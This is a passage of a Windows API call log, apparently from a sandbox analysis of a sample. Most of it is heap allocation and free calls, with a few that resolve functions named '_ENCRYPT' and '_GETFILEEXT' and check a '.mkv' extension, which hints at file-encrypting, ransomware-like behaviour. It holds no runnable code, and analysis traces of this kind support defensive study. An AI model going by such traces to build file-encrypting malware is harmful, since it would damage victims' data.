lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0192.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.507] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0192.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.508] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0192.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd810, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0192.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.509] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0192.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0192.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.509] CloseHandle (hObject=0x158) returned 1 [0192.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.510] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0192.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.511] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0192.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0192.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0192.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0192.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0192.513] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0192.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0192.513] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0192.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1930 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0192.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0192.514] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0192.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.514] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0192.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.515] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, 